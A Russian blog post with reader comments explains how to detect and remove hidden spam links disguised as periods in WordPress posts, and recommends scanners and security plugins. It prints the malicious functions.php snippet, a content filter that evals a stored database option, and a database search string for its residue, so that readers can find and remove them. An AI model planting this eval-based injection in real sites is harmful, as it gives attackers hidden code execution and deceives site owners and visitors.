Всем привет! Сегодня на SEO-Mayak.com неожиданная тема — ссылки в точке. Почему неожиданная? Потому, что эта статья не была запланирована мной заранее, а написать я ее решил после случайного обнаружения вредоносной ссылки в теле статьи, которая не была видна «не вооруженным глазом».
Странное дело, сразу в голове не укладывается. Как такое может быть, чтобы вредоносная ссылка была всего лишь точкой в статье? Уверен, что большинство веб-мастеров даже не подозревают о возможности существования таких ссылок и просто нечего об этом не слышали, так как для меня это был «гром среди ясного неба».
До чего дошел прогресс! Уважаемые мои читатели, дабы предостеречь Вас об сей скрытой опасности, я решил написать этот пост в не очереди.
Начну с того, что мне пришло письмо от моей постоянной читательницы и хорошего друга Натальи, за что ей мое огромное спасибо! Наталья написала, что обнаружила в моей статье FTP клиент Filezilla между предложениями — «На домашнем компьютере создаем папку и как-нибудь ее называем» и «В нее мы скопируем все файлы Вашего сайта и у Вас будет «Резервная копия», которую надо будет периодически обновлять» — открытую внешнею ссылку. Причем выражение — «Ссылка у Вас находится между строк» меня окончательно сбило столку.
Конечно я полез проверять статью и к своему удивлению ни чего не обнаружил.
Как потом выяснилось, у Натальи установлено расширение для браузера RDS bar, которое подсвечивает внешние ссылки определенным цветом.
Но воспользовавшись данным расширением я к своему даже уже не удивлению, а наверное разочарованию, снова ничего подозрительного на своем сайте не обнаружил.
Я даже пробежался в админку блога и посмотрел статью в редакторе, но не в html режиме и не визуальном режиме, ни чего похожего на ссылку я так и не нашел.
Потом я проверил шаблон плагином TAC, известным своей способностью находить скрытые ссылки, но опять ничего не было найдено и мой мозг тогда отказался вообще, что либо понимать.
В подтверждение своих слов, Наталья прислала мне скриншот. Вот как выглядела злополучная ссылка в моей статье на ее компьютере:
1. Видите зеленое пятнышко не скришоте, я его пометил стрелочкой, вот так расширение RDS bar пометило открытую внешнею ссылку.
2. Сайт, на который ведет данная ссылка.
Я понял одно — ссылка находится не между предложений, а каким-то образом зашифрована в точку. Но почему расширение RDS bar не подсвечивает внешнею ссылку в моем браузере? Отгадка нашлась быстро, стоило мне только зайти на сайт не как админ, а как обыкновенный посетитель и я наконец-то своими глазами увидел подсвеченную точку.
Но почему кода ссылки нет в html редакторе и где теперь его искать? Для того, чтобы окончательно убедиться в реальном существовании зловредной ссылки я запустил другое расширение для браузера, которое называется Firebug, очень нужный плагин для любого веб-мастера.
При наведении на выделенную точку я увидел следующее:
Ссылка действительно очень даже реальная и вполне внешняя. С этого момента я начну более подробно описывать все действия, которые необходимо совершить, чтобы обнаружить зашифрованную в точке ссылку.
Как обнаружить и обезвредить открытые внешние ссылки с анкором в виде точки
В первую очередь, если у вас до сих пор не установлено расширение RDS bar, то советую вам его обязательно установить.
Скачать расширение RDS bar для Google Chrome
Скачать расширение RDS bar для Mazilla Firefox
Самое продвинутое расширение RDS bar у браузера Mazilla Firefox, но и для других браузеров, также не лишне будет его скачать.
Запускаете данное расширение и в настройках указываете желаемый цвет, которым будут подсвечиваться все внешние ссылки на открытой станице.
Это на всякий случай, так как конечно совсем не обязательно штудировать все статьи блога вышеупомянутым расширением на предмет обнаружения внешних ссылок с «точечным» анкором, тем более, что такие ссылки находятся не во всех статьях, а расположены выборочно.
Немного покопавшись в интернете я нашел ответы на свои вопросы. Для того,чтобы вытравить противно-зловредную точку с сайта необходимо проверить файл functions.php, который находиться в папке с темой, и поискать в нем, что-то похожее на такой код:
add_filter('the_content', '_bloginfo', 10001); function _bloginfo($content){ global $post; if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){ return $co; } else return $content; }
Как попадает подобный код в файлы сайта? Возможно сайт был взломан или в шаблоне изначально была прописана злокачественная функция. Можно проверить файл functions.php на время последних изменений и если Вы сами в нем ни чего не редактировали, то тогда можно будет понять, была ли прописана данная функция недавно и значит сайт был взломан или она находилась в шаблоне с самого начала.
Еще есть возможность подхватить вирус при загрузки плагина, поэтому скачивайте плагины только с официальных сайтов.
Многие плагины такие, как плагины для закрытия внешних ссылок или плагины фотогалерей и другие, в своих функциях используют фильтры:
add_filter
Так вот, с помощью подобных фильтров, хакеры подменяют текст исходного контента на другой текст с уже встроенной ссылкой в точке. Удалять точки или менять их на другие знаки бесполезно, так как «точка» проявляется на другом участке текста.
Я свой сайт начинал делать еще на локальном сервере и без труда определил, что в свое время скачал шаблон с уже прописанной злокачественной функцией, что конечно очень обидно, так как я все равно его весь переделывал.
Если вдруг Вы обнаружите данный код в файле functions.php, то удаляйте его не задумываясь, но затем еще придется немного подчистить базу данных.
Чистим базу данных
Для того, чтобы почистить базу данных, зайдите на свой хостинг в раздел «Базы данных MySQL». В одной из таблиц базы данных функция фильтра автоматически прописывает обращение в виде такой строчки:
get_option(‘blogoption’)
Для выявления оставшегося корешка воспользуемся поиском в базе данных, куда вводим следующее:
return eval(file_get_contents
Поиск должен отыскать примерно следующее:
Удаляем данную запись из базы данных и немного успокаиваемся, так как «точку» мы обезвредили, но я бы не советовал на этом останавливаться. Для пущей уверенности в «чистоте» сайта рекомендую воспользоваться скриптом «Ai-bolit», который можно скачать здесь.
Распаковываем скаченный архив и открываем для редактирования файл «ai-bolit.php». В строке ‘site_url‘ прописываем URL своего сайта:
Закидываем файлы «ai-bolit.php», «.aignore» и «.aurlignore» в корень блога с помощью FTP клиента и в адресной строке браузера набираем:
http://ваш_сайт/ai-bolit.php?p=ваш_пароль
Пароль находить в файле «ai-bolit.php» в строке:
Придется немного подождать пока скрипт создаст отчет по результатам сканирования сайта.
Конечно не каждый веб-мастер может разобраться в подобном отчете, но мне он например позволил еще раз убедиться в том, что еще есть над чем работать, но об этом уже в следующих статьях.
В заключение хотел вот что сказать.
Рекомендую в целях обороны установить два простых плагина, которые не требуют ни каких особых настроек, но выстраивают прочные укрепления для отражения хакерских атак.
Плагин Anti-XSS attack. Скачать его можно с официального сайта по этой ссылке. В интернете бытуют разные мнения по поводу актуальности этого плагина, но мое мнение такое — XSS-атаки еще никто не отменял. После активации плагина при входе в админку блога Вас сначала будет перебрасывать на страницу с такой ссылкой:
Кликнув по ссылки вы попадете на страницу ввода логина и пароля.
Плагин Login LockDown. Скачать его можно с официального сайта здесь. Тоже очень простой плагин, который просто ограничивает число попыток неправильного ввода логина и пароля к Вашему сайту, блокируя доступ к адимнке после указанного числа неудачных попыток. После активации плагина в настройках можно ничего не менять.
Советую подписаться на обновления блога.
До встречи!
С уважением, Виталий Кириллов
Отличная статья, Виталий! Информации по такой проблеме я встречала очень мало. Сейчас вот сразу же буду заниматься проверкой своего блога на наличие посторонних ссылок, которые я не ставила. Особенно актуально для всех, кто на WpordPress ставит бесплатные шаблоны. В них часто встречается такая угроза. Попробую использовать скрипт ai-bolit, так хорошо описанный вами в применении.
Кошечки — чудесные! 🙂 Не могу мимо пройти!
Спасибо Наталья за высокую оценку моего скромного труда!
Ну нет нам покоя! Хакеры на стенку лезут, чтобы нагадить, проехать за чужой счет. У меня это расширение стоит. Так что теперь буду бдительна.
Анна лучше сразу проверьте, файл functions.php на наличие злокачественной функции.
Да уж, интересненько получается, а самое обидное что плагин ТАС ничего не нашёл.
А по поводу плагинов Anti-XSS Atack и Logn LockDown я тоже читал что они больше не актуальные, но не из-за того, что атаки отменили, а потому что новые версии WordPress якобы уже имеют встроенную защиту.
Я запретил вход в админку по IP.
Разумное решение, запретить вход по IP, но руководствуясь комментариями, которые оставили некоторые читатели, особенно к статье 301 редирект, я сделал вывод, что для неопытных веб-мастеров, плагины являются вполне приемлемым решением, чтобы хоть как-то защитить свой сайт. Дело в том, что они как огня боятся файла .htaccess и в плагинах видят свой спасательный круг. Что касается разных разговоров, то я так и не прочел, хоть одного внятного пояснения про актуальность плагина Anti-XSS Atack, чтобы навсегда закрыть эту тему, а если говорить про плагин Logn LockDown, то нет таких функций у движка, чтоб блокировать доступ после одного неправильного ввода пароля. Опытные же веб-мастера я думаю разберутся, как обезопасить себя от лишней головной боли. В будущем я напишу еще не одну статью про возможности файла .htaccess. Спасибо за мнение Алексей.
ещё я читал что плагин Login LockDown сильно грузит сервер. Наверное имеется ввиду при попытках подбора пароля.
Алексей, рад Вас снова видеть на боге. В ответ на ваш коментарий приведу цитату из одно высказывания — «Проверил данный плагин на предмет нагрузки на сервер. Оказалось, что плагин совсем его не не напрягает и увеличивает время загрузки сайта всего на 0,0013 мсекунд, что является очень незначительной цифрой».
Спасибо, Виталий! Сразу проверила функции. Вроде, ничего похожего нет. Надо поставить плагин. Мимо кошек не прошла)))
Но вот если бы, каждый останавливался на кошечках и потом писал об этом в комментариях, то моя жизнь бы удалась 🙂
Похвастаться, что всё получилось не могу. Надо разбираться, что это такое и где надо искать. В компьютер слабак и большой.
Спасибо за науку.
Сергей, я рад, что Вы заглянули на мой блог. Если есть решение заняться ведением блога, то наверное надо набраться терпения и упорства, так как знания сами не приходят. Возможно в будущем Вы будите с улыбкой на лице читать свои давние комментарии.
Огромное спасибо за такую информацию. Я обязательно проверю сайт на наличие таких скрытых ссылок. Расширение стоит, но я мало им пользовалась. Наверное, зря.
Пожалуйста Светлана. Рад видеть Вас на своем блоге. Не забываете, что расширение подсвечивает ссылку, только если Вы находитесь на сайте на правах обычного пользователя.
Плагин ТАС, к сожалению, очень слаб. У меня откровенные внешние ссылки в футере болтаются, а он посчитал шаблон чистым. Так что смысла в нем нет никакого.
Sasha, рад снова Вас видеть на моем блоге. Позволю себе частично с Вами не согласиться. Плагин ТАС еще довольно мощный инструмент для выявления закодированных ссылок таких как «base64_decode», просто время не стоит на месте и появляются все новые хакерские «штучки», о которых еще мало кто знает.
Да, к сожалению, мне попался продвинутый автор шаблона. Ну ничего, пока посижу так, а потом подберу более подходящую площадку.
P.S.. Заходить в гости буду регулярно), информация очень полезная. Спасибо!
Век живи и век учись. Чего только в seo не бывает.
Рад приветствовать Вас Роман у себя в гостях. Учится придется и хорошо если научишься чему-то вовремя.
Сложновато все для моего понимания — не дружу я с техникой и все тут, поэтому статью беру в закладки и буду «штудировать» не спеша.
Елена, рад видеть Вас на моем блоге. Надо стараться найти и удалить все ссылки с шаблона, а вот сами Вы это будите делать или нет — уже другой вопрос.
Виталий, Ваша статья как гром среди ясного неба!
Ничего себе открытие для меня!
Я запаниковала — не скрою!
Спасибо Вам за труд, который Вы вкладываете в Вашу работу — Ваш замечательный и полезный блог!
И за просвещение!
Спасибо Стефания! Рад снова Вас видеть на блоге.
Я всегда делаю записи в HTML редакторе, как впрочем и просматриваю подозрительные комментарии не о чем и которые, как говорят, не с той оперы в нем.
Многое действительно узнал нового, и взял на заметку
И согласен с Стефанией — у Вас замечательный и полезный блог! Взял его на заметку и под rss 😉
Уважаемый AL. Рад, что Вы заглянули на мой блог и спасибо за оценку моего скромного труда, но в следующий раз указывайте URL сайта более точно, чтоб не создавать битых ссылок.
Интересная и полезная статья, узнала много нового для себя, спасибо.
Спасибо за полезную информацию. Много читала сео-блоков и про Вордпресс, но про ссылки-точки впервые слышу. Возьму на заметку, пока сложновато все понять. С кодами у меня туго. А расширение для Mazilla Firefox у меня давно стоит. Постараюсь проверить все. Тем более, что шаблон бесплатный стоит.
Здравствуйте,Виталий! У Вас отличный блог! Нужная и полезная информация, особенно для начинающих вебмастеров. Все подробно и понятно описано, никакой воды и заумных фраз. Спасибо за Вашу работу.
Тема действительно неожиданная,пойду проверять свой сайт.
А кошки милые…а еще белёная печка и птичий гомон как звуковой фон, что-то такое деревенское, умиротворяющее.
Татьяна, рад видеть Вас на блоге и спасибо за оценку моего скромного труда.
Отличная статья, очень полезная! Но я пока не буду заморачиваться — нет ни времени, ни достаточных знаний. Один плагин у меня установлен, а вот второй надо бы установить. Спасибо за советы!
Спасибо Ольга! Рад видеть Вас на блоге.
RDS bar — очень удобная штука. Давно установлен у меня, пользуюсь.
Подписалась на Ваш блог, много чего интересного.
А мимо кошечек прошла. ))
Очень я испугалась конечно.
Надо срочно идти грузить расширение.
А что это за файл, который все как огня боятся? Я вообще не поняла, о чем это.
Ольга, рад видеть вас на своем блоге! Файл, которого бояться начинающие блогеры называется .htaccess и ошибке в этом файле приводят к разным проблемам, после которых часто приходится обращаться в службу поддержки хостинг провайдера.
А зачем люди в него лазят и делают ошибки? Я даже не знаю, где он у меня. Я все,что мне надо, нормально делаю и через админку.
Все как в медицине: чем сильнее антибиотики тем сложнее вирусы…Все, везде, всегда будут взламывать, воровать и копировать — это просто издержки и нужно относиться философски. Хорошо что вокруг много людей, которые делятся своим горьким опытом, как это сделал Виталий
Я считаю, что кто-то другой обязательно столкнется с похожей проблемой и также поделится ею на своем блоге. Вы правильно подметили, что это вирусы, которые постоянно мутируют.
Здравствуйте, Виталий. Очень полезная и интересная статья о скрытых ссылках. До чего дошёл прогресс, Скоро будем устанавливать ОС с невидимыми ссылками.
Свой шаблон конструировала сама — думала всё будет чисто. А после Вашей статьи нет такой уверенности. Есть желание проверить шаблон на скрытые внешние ссылки, чем в ближайшее время и займусь. Спасибо за статью.
Светлана рад видеть Вас на бологе! Как написала одно моя читательница, чем сильнее антибиотики тем сложнее вирусы.
Здравствуйте всем! сначала удивилась — в точке и ссылка???? Потом почитала и АХНУЛА!!!! вот как бывает!. У меня стоит 2-ой плагин Login LockDown — поставила его при установке сайта. Проверки о которых вы говорите это несколько мудрено для новичка, но инфа. очень ценная. Немного подрасту и тоже буду это делать.
Спасибо. С ув.Т.С
Здравствуйте Татьяна! Рад видеть Вас на блоге! Надо всегда быть настороже, надеюсь у Вас неприятностей с «точками» не будет.
Отправила комент иииии такое ЧУДО увидела — Рыбка золотая!!!!
Подскажите пожалуйста как и себе на сайт сделать подобную благодарность!
Премного буду вам благодарна!!!!
С ув. Т.С \ начинающий блоггер\
Татьяна, вы вот эту статью почитайте /sozdanie-bloga/plaginy-wordpress/blagodarim-posetitelya-za-pervyj-kommentarij.html
такое я точно сама не проверну — просто физически моих мозгов не хватит, но реально могла бы рассказать всем своим про это, но даже своими словами не потяну — блин, где ты был раньше? почему я про тебя никогда не слышала? просто ты гений — ну реально гений
Спасибо Larisenok за высокую оценку моего скромного труда. Рад видеть Вас на блоге!
не могу понять, как расширение RDS bar для гугл хром работает. Я его скачал и установил, у меня появился значок в правом верхнем углу, на него нажимаю, а там вот что написано: Индекс цитирования
Проиндексировано
Ссылки на сайт (ещё)
Статистика
Наличие в каталогах
Другие параметры
Нигде ничего не нажимается и не ставится ни каких галочек. Как его настроить? Подскажите
Станислав, после установке расширения в правом верхнем углу браузера у Вас появится иконка. Кликните по ней правой кнопкой мыши и выберите пункт «Настройки». На открывшийся странице с настройками найдите раздел «Подсветка на страницах» и там должно быт уже все понятно.
Здравствуйте, Виталий! Спасибо за нужную статью. Да информации очень мало по этому поводу. Когда я столкнулась с такой же проблемой, не одну бессонную ночь провела, пытаясь вычистить все с сайта. Ваша статья поможет многим избежать таких проблем! Хочу поделиться своим опытом, вдруг кому пригодится. У меня ни RDS bar ни плагин TAC ничего не показывал. Просто я сама увидела эту точку в скобочках. Правильно, она видна только тогда, когда заходишь ни как админ. У меня эта ссылка была зашита в сам шаблон. Я написала в службу поддержки своего хостинга, они мне дали ссылку, где черном по белому было прописано где в каком месте в теме надо удалить фрагмент ссылки. Сами ссылки удалять бесполезно, они вновь генерируются на новых страницах. Надо удалять код ссылки, который их генерирует и зашит он в самой теме. Выявляются эти ссылки на dinwes-seo, проверяя каждую станицу сайта, а не только главную. Но не забудьте сначала очистить историю, удалив сохраненные пароли, иначе никаких ссылок вы не увидите.
Людмила я рад, что Вы заглянули на мой блог. Я как раз и описал, где находиться код, который генерирует ссылки, и как он удаляется. После проделанной процедуры у меня проблем с ссылками больше не было!
Да, я это поняла. Просто у меня был другой код и я его удаляла в админ панели сайта в файле шаблона. Еще раз спасибо за полезную информацию, ведь не знаешь когда и где еще что-нибудь цапнешь. Ведь ситуации у всех могут быть разные и коды могут быть разные. Я тоже рада, что зашла на ваш сайт — такой полезный и нужный для новичков.
Спасибо Людмила!
Кстати, Виталий, у меня тоже такая есть ссылка, только отмечена она так — / Как убрать, вроде понятно, но будут вопросы по ходу дела к Вам)))
Задавайте конечно Людмила, постараюсь помочь.
установлено расширение RDS bar давно, ссылки вижу в тёмно-коричневом цвете, вот только как их убирать из внутренних файлов? Вот, побуду у Вас на страничке, попытаюсь сама убрать из темы ссылку.
Не смогла найти эту ссылку…В темах сайта — это в консоли?
Людмила, надо внимательно просмотреть файл funtions.php и найти в не кусочек кода, который я указал в статье. Файл funtions.php находится в паке с темой блога. Если зайти через FTP клиент, то путь будет выглядеть так: public_html -> wp-content -> themes -> название Вашей темы.
Давно пользуюсь RDS-баром. Очень удобная вещь, можно проверить исходящие ссылки на разных сайтах (и на своих в том числе).
Согласен, удобное и нужное расширение.
Нашла еще один сайт с подобной бедой. Человек похоже не подозревает об этом, написал комментарий об этом. Увидит, обрадуется. Вот что странно проверка на вирусы показал, что его сайт чист.
Наталья, это не вирус, а фильтр, поэтому проверять сайт на вирусы бесполезно!
Оценка заслуженная, не надо скромничать 😉
Спасибо Наталья!
Ясно. Теперь я уверенна, что человек даже не подозревает что подцепил нехороший код со встроенным фильтром. Если проснется и напишет, я его на эту статью пришлю 😉 Пусть полечится
Виталий, а что делает Плагин Anti-XSS attack? При входе в админку меня уведомляют что хакеры пытаются… Что делает плагин, как спасает?
Вот ссылочка на описание действий плагина/
Первый раз о таком читаю, спасибо. Буду знать на будущее и проверю сайт на всякий случай!
Я могу порекомендовать хороший плагин для WP — Wordfence Security. Плагин бесплатный. Есть версия про, но я на всех сайтах использую бесплатный вариант. Очень хороший инструмент. Регулярно обновляется. Есть множество настроек и функций. Из основных могу отметить:
1. Полное сканирование всех файлов сайта.
2. Сравнение файлов с оригиналами. Т.е. если плагин или файлы темы были изменены (даже текстовые файлы), то Wordfence об этом сразу сообщает. Более того показывает конкретно где и что было изменено (подсвечивает).
3. Есть встроенный файервол. Можно выставить настройки, например, блокировать айпи, если идут слишком частые обращения к сайту.
4. Оповещает о необходимых обновлениях плагинов или самой CMS.
5. Сканирует сайт вроде пару раз в день.
Плагин на английском языке. Но немного попользовавшись там легко разобраться.
Каждая Ваша статья, Виталий, ввергает меня в шок! Спасибо за информацию! Не думала, что столько тонкостей и сложностей!)
На самом деле Елена, сложностей и тонкостей куда больше, чем Вы себе представляете.
Вот только сегодня обнаружил у себя такую проблему, чисто случайно. После очередного комментария на блоге, стал просматривать статью и обнаружил точку-ссылку, просто провидение какое-то, как я обратил на нее внимание. А потом началось… где только не искал, но нашел не у вас, раньше решил проблему. После друг скинул ссылку на вашу статью, где более подробно описана данная проблема. Спасибо и за вашу статью.
У меня вот только вопрос, так как я не силен в технической части. Базу данных обязательно чистить, ведь в шаблоне уже нет этого кода? НЕ очень я люблю в БД ковыряться.
Сергей, лучше почистить базу. Если сами опасаетесь, обратитесь к специалисту.
Виталий, здравствуйте! Ссылку на Вашу статью мне прислал Искандер вместе с сообщением, что эти вредоносные ссылки он увидел на моём сайте.
Несколько раз прочитала Вашу статью, нашла файл functions.php у себя и … обнаружила там этот зловредный код (прямо один в один). Убрала это безобразие и попыталась предпринять следующий шаг, рекомендованный Вами. К сожалению мой хостинг timeweb затеял какую-то реконструкцию, и я не только не получила доступ к нужной папке, но и письмо им не смогла отправить (что-то этот хостинг меня последнее время совсем не радует). Подожду, когда доступ появится и попробую доделать начатое. Да и хостинг видимо пора менять.
Здравствуйте Татьяна, рад видеть Вас на блоге. Приятно осознавать, что мой труд приносит кому-то пользу.
Очень рада, что оказалась на вашем сайте. Вы очень доступно объясняете. Спасибо. Вредоносный код удалила и с удовольствием обнаружила, что ссылки в точках исчезли. В базу данных пока боюсь лезть. Наберусь смелости — залезу!Можно я иногда буду вам вопросы задавать?
Здравствуйте Любовь! Я тоже рад видеть Вас на блоге! Конечно задавайте.
Блин, Вы о котах правильно говорили….Я 40 минут ещё после окончания ролика, переходил по ссылкам:смотрел котят…Спасибо. И за котят и за блог. Толково пишете.
Добрый день, Виталий! Делала шаблон для WordPress сама, но все равно проверила файл функций, и страницы пролистала с приложением RDS-bar, ничего подозрительного не заметила. Одна только проблема, не могу разобраться со скриптом Айболит, когда перехожу по адресу http:// ваш_сайт/ai-bolit.php?p=ваш_пароль выдает ошибку 404. из-за чего так? опять невнимательность? 🙂
Может невнимательность, а может что другое.
Представляете, сегодня обновила WordPress и aibolit.php нашелся! но я конечно там мало что поняла…
Анна, там действительно сложно разобраться не специалисту.
Здравствуйте, Виталий! Очень рада, что попала к Вам «в гости» 🙂 Видимо, придется здесь «пожить» подольше, чтобы прочитать все меня интересующее… RDS bar — вещь очень полезная. Недавно я вдруг с удивлением обнаружила, что на одном из блогов с каждой страницы появляется новая ссылка. Найти источник не смогла и поменяла тему. Пока не удалила старую с хостинга, обязательно поищу показанный Вами кусочек кода… Желательно с этим разобраться. Благодарю за ценную информацию!
Здравствуйте Марина, рад видеть Вас на блоге! Уверен, что любую проблему можно решить, если будут вопросы, я буду рад помочь.
Доброго времени суток! У меня такой вопрос: после того как этот вредоносный код, проставляющий ссылки в точка, был удалён, эти ссылки, которые были им проставлены ранее пропадают или их всё равно надо искать и удалять вручную?
Здравствуйте Иван! Нет в ручную ничего удалять не надо!
Проверил всё по инструкциям и на одном из сайтов своих обнаружил злополучный код. Так что спасибо за науку!
Может, кому-то пригодится моя эпопея. Скачала расширение RDS bar для Гугл Хром, установила, и показал он у меня пять внешних ссылок. Я переполошилась, начала их искать, это оказались ссылки на Вордпресс.орг, их форум, еще две подобные и подарок от СЕО-плагина в «обновить до про-версии».
Начала через консоль управления перебирать файлы: футер, хедер, сайдбар. Потом дошло до жирафа посмотреть в интернете: «внешние ссылки в adminbar» (узнала, что это он, через div id), обнаружила, что все они висят в верхней панели, которая видна только мне. Убрала ее — ссылки исчезли. Поставила обратно и открыла окно инкогнито — ссылок нет.
Я так понимаю, поисковики не могут зайти в админ-панель, и эти внешние ссылки они не увидят. Но почему тогда я ставлю в RDS bar «разрешить использование в режиме инкогнито», и он в этом самом инкогнито показывает пять внешних ссылок при галочке в пункте профиля консоли управления «показывать верхнюю панель», если через CTRL-U я их найти не могу. Вот такая вот задачка от RDS bar для новичков, а я на всякий случай верхнюю панельку убрала.
Вы зря беспокоитесь, поисковые роботы не знают пароль от Вашей админки и следовательно не могут видеть данные ссылки.
Статья хорошая, а разве ссылка в точке приносит какую-либо пользу тем кто ее разместил?
Злоумышленник получает открытую ссылку на свой сайт, которая будет проиндексированна поисковыми системами.
Виталий может подскажите,
допустим мою ссылку разместил КАКОЙ-ТО сайт с очень большим ТИЦем. Чтобы у моего сайта поднимался ТИЦ достаточно одной ссылки с этого КАКОГО-ТО сайта на мой сайт, или чем больше ссылок с одного домена, тем лучше?
Большой ТИЦ — это какой?) Ссылки желательны с разных доменов.
Ну к примеру ТИЦ 5000 и выше. (ну для меня он большой) )))То есть по одной ссылке достаточно с разных доменов? Или нужно несколько ссылок с разных доменов?
ТИЦ 5000 конечно неплохо. Ссылок с одного домена конечно можно проставить сколько угодно, но их эффективность будет низкой. Как я уже говорил, лучше делать ссылки с разных доменов.
А нет он-лайн сервисов, чтобы определить наличие исходящих ссылок?
Вот один из многих:
linkpad.ru
.Статья классная, да и тема все еще актуальна. У меня тоже похожий случай был, скачал бесплатный шаблон с ненужным кодом, правда пока чистил его, несколько внешних ссылок уже проиндексировались поисковой системой Бинг. Но все же я удалил все. А про Ai-bolit это да…, вещь нужная и проверяет хорошо. Можно еще проверить на вирусы вот здесь
antivirus-alarm.ru
, тоже будет полезно.Виталий, здравствуйте! У Вас, как всегда, все по полочкам и доступно) Огромное спасибо! Я скачала RDS, так как онлайн проверка показала, что у меня на сайте 9 внешних ссылок. Ну 7 я знаю, а вотдва сайта, почемуха и садовод, откуда взялись понятия не имею( Ничего не подсвечивает (в настройках установила), через файзилу зашла в тему — тоже нет такого кода как Вы написали. Где же их искать? И еще странно, что RDS не показывает внешнюю ссылку на биглион, а у меня в сайдбаре стоит партнерская. Я что-то запуталась окончательно теперь(( Прошу Вашей помощи. Заранее спасибо.
И еще вопрос по ходу возник, хотя он не к этой теме (забуду потом). У Вас description человеческий, а меня почему-то выводит заголовок и первые строчки статьи((( я уже сто раз проверяла, ведь пишу нормальный по ключам и до 160 зн, а все равно не проходит. Из-за чего может такое быть? Может у Вас есть на эту тему статья?
Татьяна, какой возраст сайта?
Здравствуйте, Виталий! Не так давно антивирус (в данный момент Eset NOD32) вдруг стал при переходах к записям моего блога блокировать некую ссылку. Происходит это именно при переходах к записям — на статических страницах и главной ничего нет.
Проверка файлов утилитой aibolit-for-windows пока ничего не дает. Файлы Вордпресс, темы и плагинов, которые кажутся утилите подозрительными, оказываются идентичными файлам из соответствующих архивов. Ну, или скриптами, которые я сам устанавливал: скрипт кнопок pluso в single.php, скрипт Ваших кнопок «вверх — вниз» в футере.
Кстати, проверка на вирусы в большинстве онлайн-сервисов (скажем, ReScan) тоже ничего не показывает.
Что бы это могло быть? И где поискать?
Здравствуйте, Александр!
Очень часто антивирусы определяют ссылки, как вредные, которые идут с рекламных баннеров.
Бывает так, что ссылка ведет на сайт с вредным скриптом и антивирус это может отслеживать.
Здравствуйте, Виталий! Тоже так подумал сначала. Но все-таки это оказался скрипт кнопок Pluso. Попробовал его заменить кнопками Share 42, только что-то не пошло. В итоге — временно использую один плагин. И ищу замену 🙂